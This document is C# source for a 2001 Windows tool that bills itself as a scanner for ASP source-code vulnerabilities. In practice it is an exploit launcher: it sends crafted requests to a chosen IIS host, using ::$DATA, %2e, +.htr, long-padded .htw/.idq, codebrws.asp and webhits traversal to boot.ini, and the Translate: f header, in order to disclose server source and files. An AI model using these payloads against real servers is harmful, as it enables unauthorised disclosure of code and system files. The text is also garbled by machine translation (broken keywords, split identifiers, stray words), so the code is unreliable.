An application that uses C # To scan ASP source code vulnerabilities

The source code of the main part of the program.
//--------------------------------------------------------------------------
//
// File name: form1.cs
//
// Description: master form
//
// Date: 2001/1/3
//
// Author: bigeagle@163.net
// Http://bigeagle.yeah.net
//
// History: 2000/1/3 version 0.9
//
// The todo: Translate: F method seems to be faulty. After you get the relevant HTTP information, modify it.
//
//-------------------------------------------------------------------------

Namespace findbug
{
Using system;
Using system. drawing;
Using system. collections;
Using system. componentmodel;
Using system. winforms;
Using system. Data;
Using system. net;
Using system. IO;
Using system. text;
Using system. net. Sockets;

/// <Summary>
/// Summary description for form1.
/// </Summary>
Public class form1: system. winforms. Form
{
/// <Summary>
/// Required designer variable.
/// </Summary>
Private system. componentmodel. Container components;
Private system. winforms. statusbar barstatus;
Private system. winforms. Button btnclear;
Private system. winforms. textbox txtresult;
Private system. winforms. Button btngo;
Private system. winforms. Label label3;
Private system. winforms. ComboBox cbomethod;
Private system. winforms. textbox txtfilename;
Private system. winforms. Label label2;
Private system. winforms. textbox txtserver;
Private system. winforms. Label label1;
Private system. winforms. menuitem mnuexit;
Private system. winforms. menuitem menuitem1;
Private system. winforms. menuitem mnunew;
Private system. winforms. menuitem mnuabunt;
Private system. winforms. menuitem mnuhelp;
Private system. winforms. menuitem mnusave;
Private system. winforms. menuitem mnufile;
Private system. winforms. mainmenu mainmenu1;

Public form1 ()
{
//
// Required for Windows Form Designer support
//
Initializecomponent ();

// Initialization window
Initform ();

}

Public override void dispose ()
{
Base. Dispose ();
Components. Dispose ();
}

// Initialize the control
Private void initializecomponent ()
{
This. components = new system. componentmodel. Container ();
This. mnusave = new system. winforms. menuitem ();
This. mnunew = new system. winforms. menuitem ();
This. cbomethod = new system. winforms. ComboBox ();
This. btngo = new system. winforms. Button ();
This. menuitem1 = new system. winforms. menuitem ();
This. mnufile = new system. winforms. menuitem ();
This.txt Server = new system. winforms. Textbox ();
This. mnuhelp = new system. winforms. menuitem ();
This. btnclear = new system. winforms. Button ();
This. label2 = new system. winforms. Label ();
This. label1 = new system. winforms. Label ();
This. mnuabunt = new system. winforms. menuitem ();
This. barstatus = new system. winforms. statusbar ();
This. mainmenu1 = new system. winforms. mainmenu ();
This. mnuexit = new system. winforms. menuitem ();
This.txt result = new system. winforms. Textbox ();
This. label3 = new system. winforms. Label ();
This.txt filename = new system. winforms. Textbox ();
Mnusave. Text = "save ";
Mnusave. Shortcut = system. winforms. Shortcut. ctrls;
Mnusave. Index = 1;
Mnunew. Text = "new ";
Mnunew. Shortcut = system. winforms. Shortcut. F2;
Mnunew. Index = 0;
Mnunew. Click + = new system. eventhandler (this. mnunew_click );
Cbomethod. Location = new system. Drawing. Point (96, 56 );
Cbomethod. size = new system. Drawing. Size (121, 20 );
Cbomethod. tabindex = 4;
Btngo. Location = new system. Drawing. Point (296, 56 );
Btngo. size = new system. Drawing. Size (75, 23 );
Btngo. tabindex = 6;
Btngo. Text = "show me ";
Btngo. Click + = new system. eventhandler (this. btngo_click );
Menuitem1.text = "-";
Menuitem1.index = 2;
Mnufile. Text = "file (& F )";
Mnufile. Index = 0;
Mnufile. menuitems. All = new system. winforms. menuitem [4] {This. mnunew, this. mnusave, this. menuitem1, this. mnuexit };
Txtserver. Location = new system. Drawing. Point (96, 16 );
Txtserver. Text = "http ://";
Txtserver. tabindex = 1;
Txtserver. size = new system. Drawing. Size (100, 21 );
Mnuhelp. Text = "Help (& H )";
Mnuhelp. Index = 1;
Mnuhelp. menuitems. All = new system. winforms. menuitem [1] {This. mnuabunt };
Btnclear. Location = new system. Drawing. Point (408, 56 );
Btnclear. size = new system. Drawing. Size (75, 23 );
Btnclear. tabindex = 8;
Btnclear. Text = "clear ";
Btnclear. Click + = new system. eventhandler (this. btnclear_click );
Label2.location = new system. Drawing. Point (224, 16 );
Label2.text = "file name :";
Label2.size = new system. Drawing. Size (72, 16 );
Label2.font = new system. Drawing. Font ("", 12 );
Label2.tabindex = 2;
Label1.location = new system. Drawing. Point (24, 21 );
Label1.text = "Host Name :";
Label1.size = new system. Drawing. Size (72, 16 );
Label1.font = new system. Drawing. Font ("", 12 );
Label1.tabindex = 0;
Mnuabunt. Text = "about ";
Mnuabunt. Shortcut = system. winforms. Shortcut. ctrla;
Mnuabunt. Index = 0;
Mnuabunt. Click + = new system. eventhandler (this. mnuabunt_click );
Barstatus. backcolor = system. Drawing. systemcolors. Control;
Barstatus. Location = new system. Drawing. Point (0,423 );
Barstatus. size = new system. Drawing. Size (568, 18 );
Barstatus. tabindex = 9;
Barstatus. Text = "ready ";
Mainmenu1.menuitems. All = new system. winforms. menuitem [2] {This. mnufile, this. mnuhelp };
Mnuexit. Text = "exit (& X )";
Mnuexit. Shortcut cut = system. winforms. Shortcut cut. altf4;
Mnuexit. Index = 3;
Mnuexit. Click + = new system. eventhandler (this. mnuexit_click );
Txtresult. Location = new system. Drawing. Point (16, 96 );
Txtresult. multiline = true;
Txtresult. scrollbars = system. winforms. scrollbars. Both;
Txtresult. tabindex = 7;
Txtresult. size = new system. Drawing. Size (536,312 );
Txtresult. Visible = false;
Label3.location = new system. Drawing. Point (32, 56 );
Label3.text = "use ";
Label3.size = new system. Drawing. Size (56, 16 );
Label3.font = new system. Drawing. Font ("", 12 );
Label3.tabindex = 5;
Txtfilename. Location = new system. Drawing. Point (304, 16 );
Txtfilename. tabindex = 3;
Txtfilename. size = new system. Drawing. Size (232, 21 );
This. Text = "viewaspcode ";
This. startposition = system. winforms. formstartposition. centerscreen;
This. autoscalebasesize = new system. Drawing. Size (6, 14 );
This. Menu = This. mainmenu1;
This. clientsize = new system. Drawing. Size (568,441 );
This. Controls. Add (this. barstatus );
This. Controls. Add (this. btnclear );
This. Controls. Add (this.txt result );
This. Controls. Add (this. btngo );
This. Controls. Add (this. label3 );
This. Controls. Add (this. cbomethod );
This. Controls. Add (this.txt filename );
This. Controls. Add (this. label2 );
This. Controls. Add (this.txt server );
This. Controls. Add (this. label1 );
}

// Click "about" in the menu to display the "about" dialog box.
Protected void mnuabount_click (Object sender, system. eventargs E)
{
About objabout = new about ();
Objabout. showdialog (this );
Objabout. Dispose ();
}

// Initialization window
Private void initform ()
{
This. cbomethod. Items. Add ("read directly ");
This. cbomethod. Items. Add (".");
This. cbomethod. Items. Add ("% 81 ");
This. cbomethod. Items. Add (": Data ");
This. cbomethod. Items. Add ("% 2e ");
This. cbomethod. Items. Add ("% 2e % 41sp ");
This. cbomethod. Items. Add ("+. htr ");
This. cbomethod. Items. Add ("//");
This. cbomethod. Items. Add ("longhtr ");
This. cbomethod. Items. Add (". Bak ");
This. cbomethod. Items. Add ("codebrws. asp ");
This. cbomethod. Items. Add ("Showcode. asp ");
This. cbomethod. Items. Add ("null. HTW ");
This. cbomethod. Items. Add ("qfullhit. HTW ");
This. cbomethod. Items. Add ("qsumrhit. HTW ");
This. cbomethod. Items. Add ("query. idq ");
This. cbomethod. Items. Add ("Search/qfullhit. HTW ");
This. cbomethod. Items. Add ("Search/qsumrhit. HTW ");
This. cbomethod. Items. Add ("iirturnh. HTW ");
This. cbomethod. Items. Add (". HTW ");
This. cbomethod. Items. Add ("translate: F ");

This. cbomethod. selectedindex = 0;
}

// Create
Protected void mnunew_click (Object sender, system. eventargs E)
{
This.txt server. Text = "http ://";
This.txt filename. Text = "";
This.txt result. Text = "";
}

// Clear the result
Protected void btnclear_click (Object sender, system. eventargs E)
{
This.txt result. Text = "";
}

// Main method
Protected void btngo_click (Object sender, system. eventargs E)
{

// Parse the URL
String strserver = this.txt server. text;
String strurl = this.txt filename. text;
Char [] Point = {'.'}; // defines the delimiter "."
Char [] line = {'/'}; // defines the delimiter "."
String [] arrstring = strurl. Split (line );

// Obtain the full name of the ASP file
String strfilename = arrstring [arrstring. Length-1];
// Find the path from the root directory
String strpath = strurl. substring (0,
Strurl. Length-strfilename. Length );

// Parse the full name of the file
Arrstring = strfilename. Split (point );
// Obtain the file extension.
String strlast = arrstring [arrstring. Length-1];
// Calculate the file name
String strfirst = strfilename. substring (0,
Strfilename. Length-strlast. Length-1 );

// Invalidate buttons and input boxes
This.txt server. readonly = true;
This.txt filename. readonly = true;
This. btnclear. Enabled = false;
This. btngo. Enabled = false;

If (this.txt server. Text = "http: //" | this.txt filename. Text = ""
| This.txt server. Text. Trim () = "" |
This.txt server. Text. substring (0, 7 )! = "Http ://")
{
MessageBox. Show ("enter the correct host name and file name! ");
This.txt server. Focus ();
}
Else
{
This.txt result. Visible = true;
This.txt result. readonly = true;
This. barstatus. Text = "connecting host... ";

String strrequestfile;

Switch (this. cbomethod. selectedindex)
{
Case 0: // read directly
Strrequestfile = strserver + strurl;
Break;
Case 5: // % 2e % 41sp
Strrequestfile = strserver + strpath + strfirst
+ "% 2e % 41sp ";
Break;
Case 8: // longhtr
Strrequestfile = strserver + strurl
+ "+ % 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20%"
+ "20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20%"
+ "20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20.htr ";
Break;

Case 10: // codebrws. asp
Strrequestfile = strserver + "/iissamples/ExAir/howitworks/codebrws. asp? Source ="
+ Strurl;
Break;

Case 11: // Showcode. asp
Strrequestfile = strserver + "/iissamples/ExAir/howitworks/codebrws. asp? Source ="
+ "/MSADC/.../boot. ini ";
Break;

Case 12: // null. HTW
Strrequestfile = strserver + "/null. HTW? Ciwebhitsfile ="
+ Strurl + "% 20 & cirestriction = none & cihilitetype = Full ";
Break;
Case 13: // qfullhit. HTW
Strrequestfile = strserver + "/iissamples/ISSamples/OOP/qfullhit. HTW? "
+ "Ciwebhitsfile =/.../../boot. ini & cirestriction = none"
+ "& Cihilitetype = Full ";
Break;

Case 14: // qsumrhit. HTW
Strrequestfile = strserver + "/iissamples/ISSamples/OOP/qsumrhit. HTW? "
+ "Ciwebhitsfile =/.../../boot. ini & cirestriction = none"
+ "& Cihilitetype = Full ";
Break;

Case 15: // query. idq
Strrequestfile = strserver + "/query. idq? Citemplate =/.../../boot. ini"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20%"
+ "20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20.htx ";
Break;

Case 16: // search/qfullhit. HTW
Strrequestfile = strserver + "/iissamples/ExAir/search/qfullhit. HTW? "
+ "Ciwebhitsfile =/.../../boot. ini & cirestriction = none"
+ "& Cihilitetype = Full ";
Break;

Case 17: // search/qsumrhit. HTW
Strrequestfile = strserver + "/iissamples/ExAir/search/qsumrhit. HTW? "
+ "Ciwebhitsfile =/.../../boot. ini & cirestriction = none"
+ "& Cihilitetype = Full ";
Break;

Case 18: // iirturnh. HTW
Strrequestfile = strserver + "/IISHelp/IIS/MISC/iirturnh. HTW? "
+ "Ciwebhitsfile =/.../../boot. ini & cirestriction = none"
+ "& Cihilitetype = Full ";
Break;

Case 19: //. HTW
Strrequestfile = strserver + strurl
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20%"
+ "20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% running htw? "
+ "Ciwebhitsfile =/.../../boot. ini & cirestriction = none"
+ "& Cihilitetype = Full ";
Break;

Default:
Strrequestfile = strserver + strurl + this. cbomethod. text;
}

This. barstatus. Text = "Send request :"
+ (Strrequestfile. length> = 50?
Strrequestfile. substring (0, 50)
: Strrequestfile)
+ "...";

String strresult;
// If it is not the translate: F method, you can directly send an HTTP request
If (this. cbomethod. selectedindex! = 20)
{
// Send an HTTP request directly
Strresult = get_http (strrequestfile );

This. barstatus. Text + = "complete. ";
Strresult = ""? "Not found! ": Strresult;
This.txt result. Text = strresult;
}
Else // translate: The F method requires a TCP/IP connection.
{
String strrequest = "get" + strserver + strurl
+ "/R/nhttp/1.0/R/ntranslate: F/R/N ";
Strresult = get_socket_request (strserver, strrequest, 80 );
This. barstatus. Text + = "complete. ";
Strresult = ""? "Not found! ": Strresult;
This.txt result. Text = strresult;

}

}

// Restore button and Input
This.txt server. readonly = false;
This.txt filename. readonly = false;
This. btnclear. Enabled = true;
This. btngo. Enabled = true;

}

// Establish a TCP/IP connection with the server and send the socket command
Private string get_socket_request (string a_strserver, string a_strrequest, int32 a_intport)
{
// Set up variables and string to write to the server
Encoding ASCII = encoding. default;
String get = a_strrequest + "connection: Close/R/n/R/N ";
// String get =
Byte [] byteget = ASCII. getbytes (get );
Byte [] recvbytes = new byte [1, 256];
String strretpage = NULL;

// IPaddress and ipendpoint represent the endpoint that will
// Receive the request
IPaddress hostadd = DNS. Resolve (a_strserver.substring (7, a_strserver.length-7 ));
Ipendpoint ephost = new ipendpoint (hostadd, a_intport );

// Create the socket for sending data over TCP
Socket S = new socket (addressfamily. afinet, sockettype. sockstream,
Protocoltype. prottcp );

// Connect to host using ipendpoint
If (S. Connect (ephost )! = 0)
{
Strretpage = "unable to connect to host ";
Return strretpage;
}

// Sent the get text to the host
S. Send (byteget, byteget. length, 0 );

// Receive the page, loop until all bytes are stored ed
Int32 bytes = S. Receive (recvbytes, recvbytes. length, 0 );
Strretpage = strretpage + ASCII. getstring (recvbytes, 0, bytes );

While (Bytes> 0)
{
Bytes = S. Receive (recvbytes, recvbytes. length, 0 );
Strretpage = strretpage + ASCII. getstring (recvbytes, 0, bytes );
}

Return strretpage;
}

// Obtain the HTTP page Function
Private string get_http (string a_strurl)
{
String strresult;
Httpwebrequest myreq = (httpwebrequest)
Webrequestfactory. Create (a_strurl );

Try
{
Httpwebresponse httpwresp = (httpwebresponse) myreq. getresponse ();
Stream mystream = httpwresp. getresponsestream ();

Streamreader sr = new streamreader (mystream, encoding. Default );
Stringbuilder strbuilder = new stringbuilder ();
While (-1! = Sr. Peek ())
{
Strbuilder. append (Sr. Readline () + "/R/N ");
}

Strresult = strbuilder. tostring ();
}
Catch (exception exp)
{
Strresult = "error:" + exp. message;
}

Return strresult;

}

// Exit
Protected void mnuexit_click (Object sender, system. eventargs E)
{

If (MessageBox. Show ("are you sure you want to exit? "," Exit System ", MessageBox. yesno) = dialogresult. Yes)
{
This. Close ();

}
}

// Main Function
Public static void main (string [] ARGs)
{
Application. Run (New form1 ());
}
}
}